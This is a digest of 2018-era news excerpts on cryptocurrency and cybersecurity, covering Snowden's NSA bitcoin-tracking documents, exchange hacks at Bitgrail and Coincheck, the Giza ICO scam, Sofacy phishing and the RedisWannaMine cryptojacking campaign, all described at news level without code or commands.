Snowden Releases NSA Documents Showing Bitcoin Was “#1 Priority”

By: C Edward Kelso

Xkeyscore. MAC addresses. OAKSTAR. MONKEYROCKET. Edward Snowden is at it again. This time the world’s most notorious whistleblower has handed over National Security Agency (NSA) documentation to online investigative news outlet The Intercept revealing an invasive covert program to track bitcoin users using spy tools he uncovered during his infamous first go-round. The implications include the future of privacy along with warrantless data collection being used to prosecute bitcoiners such as Ross Ulbricht of Silk Road.

Snowden Reveals How NSA Tracked Bitcoin Users

Ever get the feeling you’re being watched? Department of Homeland Security (DHS) Acting Assistant Secretary for Legislative Affairs Brian de Vallance, in a November 2013 letter to Congress, worried that “with the advent of virtual currencies and the ease with which financial transactions can be exploited by criminal organizations, DHS has recognized the need for an aggressive posture toward this evolving trend.” Infamous whistleblower Edward Snowden seems to have found a trove of heavily redacted, classified NSA documents attesting to that “aggressive posture.”

It’s fitting Mr. Snowden should share them with The Intercept, an online investigative news organization founded by his benefactor, attorney turned journalist Glenn Greenwald. Mr. Greenwald was then writing for The Guardian, and the two unleashed the largest batch of government security documents ever revealed about US and UK global surveillance.


Snowden Releases NSA Documents Showing Bitcoin Was "#1 Priority"

Interestingly, the documents tracking bitcoin users stem from roughly the same period, 2013. They detail bitcoiners all over the world were targeted as powers granted the NSA under the rubric of fighting terrorism expanded, and might have even begun to play a role in early crypto prosecutions such as Ross Ulbricht and Silk Road.

American Civil Liberties Union’s Patrick Toomey, of its National Security Project, explained, “If the government’s criminal investigations secretly relied on NSA spying, that would be a serious concern. Individuals facing criminal prosecution have a right to know how the government came by its evidence, so that they can challenge whether the government’s methods were lawful. That is a basic principle of due process. The government should not be hiding the true sources for its evidence in court by inventing a different trail.”



Email Fraud is a Top Business Risk for 2018

By: Phee Waterfield

Email fraud is a top risk for 2018, resulting in employee termination.

Reports from Proofpoint and Clearswift show that businesses across the globe are concerned about email phishing campaigns.

Today, two reports highlight that email phishing is a top concern for global businesses. However, a third of employees believe it is lack of support from execs that is the biggest challenge to protection – demonstrating a disconnect between the board and IT.

Proofpoint’s 2018 Understanding Email Fraud Survey asked 2250 senior IT decision makers across the US, UK, France, Germany and Australia for their email fraud experiences from the last two years. The results found 75% of organizations had experienced at least one targeted email fraud attack, with 41% suffering multiple attempts in the last two years.

Concerningly, more than 77% of businesses expect they will fall victim to email fraud in the next 12 months, and only 40% have full visability into email threats.

“Email fraud is highly pervasive and deceptively simple; hackers don’t need to include attachments or URLs, emails are distributed in fewer volumes, and typically impersonate people in authority for maximum impact,” said Robert Holmes, vice-president of email security products for Proofpoint. “These and other factors make email fraud, also known as business email compromise (BEC), extremely difficult to detect and stop with traditional security tools. Our research underscores that organizations and boardrooms have a duty to equip the entire workforce with the necessary solutions and training to protect everyone against this growing threat.”

Clearswift also identified that UK organizations were concerned about ex-employees retaining access to business networks and human error.


Infographic: How to safely buy and sell cryptocurrency

By: Brandon Vigliarolo

Cryptocurrency exchanges and theft have been regular news since Bitcoin went big, but that hasn’t deterred investors: The number of digital cryptocurrency wallets in existence by the end of 2017 was 21.5 million. That’s a huge increase from 2015, when only 5.4 million wallets were around.

Along with the new popularity of cryptocurrency has come a new breed of cryptocurrency criminals. In 2016 $95 million worth of Bitcoin was stolen, and in 2017 the amount stolen exploded: $115 million was lost to phishing, $103 million to exploitation of software and storage, $7.4 million to hacks, and $4,000 to Ponzi schemes.

That’s a lot of lost cryptocurrency—so how are criminals doing it?

Five ways cryptocurrency gets stolen

There are five popular ways that cryptocurrency criminals get their hands on your virtual coins:

  • Brute forcing, in which an attacker simply tries again and again to guess a password until they finally get in.
  • Phone porting, in which criminals call cellular customer service, have a number transferred to their phone, and use the number to reset a crypto account password.
  • Phishing, which installs malware that looks for, and steals, digital wallet addresses.
  • Ponzi schemes, in which investors are paid returns that are actually just the money new investors put in (see BitConnect).
  • Mining malware, which uses a victim’s computer to do the mining for the hacker.

So, risks come from all angles: anonymous hackers on the internet, fake exchanges that run away with your money, or even malware that makes you do the work for someone else’s gain.

That doesn’t mean safe investment isn’t possible.

How to safely invest in cryptocurrency

Cryptocurrency brokerage CryptoGo has some tips for investing in cryptocurrency without placing yourself in harm’s way.

  • Encrypt and back up safely so that you always have a record of your wallet. Use a mnemonic phrase to ensure you can recover a lost wallet.
  • Use an antivirus product that was built with cryptocurrency in mind, such as Spybot Anti-Beacon or Comodo.
  • Only use “hot wallets,” those that are connected to the internet, for small transactions. If you’re going to store large amounts of cryptocurrency for long-term investment keep them in a secure, offline wallet.
  • Use multifactor authentication, either through a hardware token or an app, to secure cryptocurrency-related accounts.
  • Don’t use SMS authentication—phone numbers can be stolen via phone porting.
  • Diversify your holding through different exchanges and use different passwords and recovery methods for each one.


Bitgrail to Refund Hack Victims with Newly Created BGS Tokens

By: Samuel Haig

Bitgrail has denied responsibility for the recent hack that saw the theft of 17 million XRB, or Nano, in comments made in a Telegram group for victims of the hack. Despite rejecting responsibility for the incident, the exchange states that it will “voluntarily” refund users through the creation and issuance of BGS tokens.

Bitgrail Operator Denies Responsibility for Hack

A document prepared by the operator of Bitgrail, Francesco “The Bomber” Firano, has been the subject of widespread reporting, following its dissemination to members of a Telegram group comprised of victims of Bitgrail’s hack.

A translated summary of the document has been made available by the Telegram group, as Mr. Firano apparently “did not want […] the whole doc[ument]” shared. The release of the translated document was approved by Mr. Firano.

The summary states that Bitgrail “plans [to] reopen soon,” adding that the date on which it will re-launch “will be announced soon.” The document also asserts that Bitgrail “still sees themselves as not responsible for the theft and therefore they believe they have no obligation to refund stolen coins”.

Bitgrail to Refund Users with BGS Tokens

Bitgrail states that “on reopen […] all non-nano funds will be available and withdrawable, nano balance will be set to 20% of what it was before.” In order to repay the remaining 80% of nano balances, Bitgrail states that it will “voluntarily” introduce a new token called BGS (Bitgrail Shares), which will be distributed to victims of the hack. Bitgrail claims that it will then purchase back the BGS tokens at a rate of “$10.50 USD” per token, with purchases set to take place at the end of each month. The summary states that Bitgrail will use half of its monthly profits to conduct the purchases.

Participation in the company’s “voluntar[y]” refund comes with a stipulation, however, as customers of the “platform after reopen will [be] requir[ed] to sign a “waiver of all rights for legal action.”


Sofacy Targets Government Agency with New Spear-Phishing Campaign

By: Phee Waterfield

The Sofacy group, also known as APT28 and Fancy Bear, has carried out an attack on an unnamed European government agency using an updated variant of DealersChoice.

Details of the attack, which have been published by Unit42 – part of Palo Alto Networks – describe the espionage group using doc.x files titled “Defence & Security 2018 Conference Agenda,” which appears to have been copied directly from the website for the “Underwater Defence & Security 2018 Conference.”

Back in October 2016, the security researchers published an initial analysis on a Flash exploitation framework used by the Sofacy threat group called DealersChoice. The attack consisted of Microsoft Word delivery documents that contained Adobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly provided by a command and control server. Sofacy continued to use DealersChoice throughout the fall of 2016, which was documented in December 2016.

However, the attacks that took place on March 12 and 14 used a different variation of the spear-phishing attack, something not seen from Sofacy before.

Unlike in the fall of 2016, the Flash object in the document is only loaded if the user scrolls through the entire content of the delivery document and views the specific page the Flash object is embedded in. Then the object contacts an active C2 server to download an additional Flash object containing exploit code.


How Secure Is Your Online Banking App?

By: Sarah Vonnegut

When it comes to developing applications that handle such sensitive information, making sure security is baked into every step of the SDLC is crucial.

Learning by doing is more effective than learning by watching – that’s why Codebashing offers a hands-on interactive training platform in 10 major programming languages. Learn more about AppSec training for enterprise developers.

Banking has gone digital. Nearly every major bank offers both an online portal as well as a mobile app, and people seem to prefer it that way. A recent PwC survey found that 46% of consumers only use online banking, a massive jump from their previous survey in 2012, in which only 27% used online banking exclusively.

For banks and other financial institutions, offering an online app that allows either online or mobile banking access is now a necessity when looking at those numbers. Users crave the convenience that comes with banking on the go, and while the advantages that come with being able to perform personal banking on your mobile or computer is undeniable, another question still persists: Just how secure are these online banking apps?

Research that was released at the end of 2017 may offer an answer to that question. The research, carried out at the University of Birmingham, found security issues in mobile banking apps that could leave millions of their users open to attacks. The main issue they found pertains to a flaw in certificate pinning, which meant that tests were failing to detect “a serious vulnerability that could let attackers take control of a victim’s online banking,” The Register said.

It’s security issues like this that show just how important it is to cover all your bases when developing digital banking apps. While digital banking can help foster new connections and offer new and innovative services, thus bringing more gains for financial institutions, digital banking also carries plenty of risk.

7 Critical Steps for Banking App Developers

While consumers carry a burden of security that includes using secure wifi to access their banking app, locking their devices when not using them, using a unique password, and not using public computers to access their accounts, the main burden of ensuring customers’ security is on the banks. Or rather, the developers and teams working on the applications.

Developing an SDLC, or software development lifecycle, is vital to the continued development of secure applications. The SDLC will put in place a strategy for making sure security is built into the product, without slowing the development process down. Here are seven critical steps in the SDLC that developers and security teams should work together on to ensure the release of a secure online or mobile banking app.

1. Establish Security Requirements

The first step is to understand the security requirements of the banking app. Because of the sensitive nature of banking apps, it is important to assign at least one member of the security team to work with the build team – and this partnership needs to begin before development does.

During this part of the SDLC, development and security should identify the key security risks within the software, including what standards (both organizational and legal/regulatory) the software must follow. Stakeholders from both development and security teams should be identified to make sure communication is clear from the outset, and any gaps in the process should be noted. Only once security requirements have been established and agreed upon by all parties can development begin.


Cryptocurrency scammers run off with more than $2 million after ditching their investors


Scammers appear to have made off with more than $2 million in cryptocurrency after carrying out an apparent fake initial coin offering (ICO), and the individuals linked to the incident may be connected to another recent theft, CNBC has learned.

A bad actor or actors used a fake LinkedIn profile and copied pictures from another user’s Instagram to create a false persona — and successfully drew more than 1,000 investors into the ICO project, which was called Giza.

The Wild West world of ICOs

An initial coin offering or ICO is a way for start-ups to crowd-fund investment. Instead of raising cash from venture capitalists, a company can hold an ICO, which allows people to invest a cryptocurrency, such as ethereum or bitcoin, in exchange for a new token that’s issued by the start-up. The new digital coin is not equity. Instead, it can be used in exchange for future services offered by the company. It’s also possible that the new coin may climb to a much higher value than the initial investment.

There is big money in ICOs, and they are largely unregulated. Last year, companies raised $3.8 billion via ICOs, and this year alone they have already raised $2.8 billion, according to data from CoinSchedule, a site which tracks the activity in the space.

But ICOs are unregulated in most countries, meaning investors don’t have the protections that they enjoy with other assets such as stocks. However regulators are keeping a closer eye on ICO activity, amid a rising number of reports of scams.

What happened with Giza?

Investors who spoke to CNBC all described a common experience with the ICO in question: They thought the project was legitimate until warning signs began to appear, including a falling out with the company’s sole supplier, a lack of correspondence from its supposed founders, and failed attempts to recoup the lost funds.

The apparently well-orchestrated scam centers around a mysterious individual called Marco Fike, the COO of Giza. Among the eight investors, partners and former employees of Giza interviewed by CNBC, all claim they have never seen Marco Fike’s face.

The ICO was for a supposed start-up called Giza, which claimed to be developing a super-secure device that would allow people to store cryptocurrencies.

It carried out its ICO in January and drew investors for several weeks after. One person who put money into the project told CNBC that they invested ether that was equivalent to $10,000 at the time, and another said they had put in around $5,000 worth of ether.

At the beginning of February, Giza had raised and was holding more than 2,100 ethereum coins, which at the time were worth around $2.4 million. All but $16 worth of those ethereum coins are now missing.


Cryptojacking attack uses leaked EternalBlue NSA exploit to infect servers.

By: Charlie Osborne

RedisWannaMine is a sophisticated attack which targets servers to fraudulently mine cryptocurrency.

Researchers have uncovered a new cryptojacking scheme which utilizes the leaked NSA exploit EternalBlue to infect vulnerable Windows servers.
On Thursday, security professionals from Imperva revealed the attack, warning that this latest scheme is far more sophisticated than most recorded cryptojacking attempts, which are generally rather simple in nature.

The new attack, called RedisWannaMine, targets servers to mine cryptocurrency and “demonstrates a worm-like behavior combined with advanced exploits to increase the attackers’ infection rate and fatten their [operator] wallets.”

When a target server has been identified, the malware exploits CVE-2017-9805, an Apache Struts vulnerability which impacts the Struts REST plugin with XStream handler.

If exploited, the security flaw allows attackers to remotely execute code without authentication on an application server.

This vulnerability is used by the attackers to run a shell command which downloads cryptocurrency mining malware.

However, the downloader used is more sophisticated than usual, as it also gains persistency through new server entries in crontab, and gains remote access to a victim machine through new SSH key entries in the authorized keys sector, as well as the system’s iptables.

Other packages are also downloaded using standard Linux package managers, and one particular GitHub tool, a TCP port scanner called masscan, is also included in the payload.


Coincheck to Start Compensating Hack Victims and Resume Operations Next Week.

By: Kevin Helms


Hacked Japanese exchange Coincheck is getting ready to start compensating its customers next week as it plans to resume operations. The exchange has been slapped with two business improvement orders so far by Japan’s financial regulator and may stop trading some cryptocurrencies for safety reasons.

Repayment Beginning Next Week

Major Japanese cryptocurrency exchange Coincheck announced on Thursday that it will start compensating customers next week, according to Nikkei. The exchange was hacked on January 26 and lost approximately 58 billion yen (~USD$550 million) worth of the cryptocurrency NEM, held by approximately 260,000 customers. The incident forced the company to suspend nearly all of its services.

Coincheck’s repayment plan revealed on Thursday is in line with the company’s announcement in February, according to COO Yusuke Otsuka. The exchange has promised to repay victims 88.549 yen for each of the NEM coins stolen, which is a total of 46 billion yen. However, some are criticizing this decision, demanding compensation of the full amount at the time of the hack.

The exchange is also repaying victims in Japanese yen, rather than in cryptocurrency, adding that the funds will appear in customers’ accounts starting next week. Meanwhile, multiple lawsuits have already been filed against the company by victims for the return of their cryptocurrencies.

Method of Attack

The investigation by the Japan Exchange Group (NEC) and five financial security companies revealed that “the cause of the leakage is seen as a malware infection via email to employee PCs,” Oricon reported. Multiple Coincheck employees received the malware-laced email, Otsuka described. Once an infected link was clicked, the virus spread, leading to the NEM theft, Nikkei explained.

However, the COO cannot reveal whether the email originated from overseas or within Japan. “I am under investigation and I cannot reveal it,” the news outlet quoted him saying. Emphasizing that cryptocurrencies will be stored in cold wallets going forward, he detailed:


UK company linked to laundered Bitcoin billions

By: Geoff White

A UK company has been linked to the laundering of 650,000 stolen bitcoins worth £4.5bn, a BBC Radio 4 investigation has found.

The coins were taken by hackers from Tokyo-based Bitcoin exchange Mt Gox, leaving tens of thousands of customers out of pocket.

It’s not clear who is in control of the London-based firm Always Efficient LLP.

Mt Gox operator Mark Karpeles apologised to investors and said he was co-operating with the investigation.

The FBI has charged a Russian national with laundering the stolen bitcoins.

Mt Gox matched up those who wanted to buy the crypto-currency with dollars, pounds and other international denominations with those wanting to sell bitcoins, and handled an estimated 70% of the world’s Bitcoin trade.

The exchange was originally set up to trade cards from a game set in a world of wizards, spells and monsters. When it turned its focus to crypto-currencies, it appeared to be a huge success story.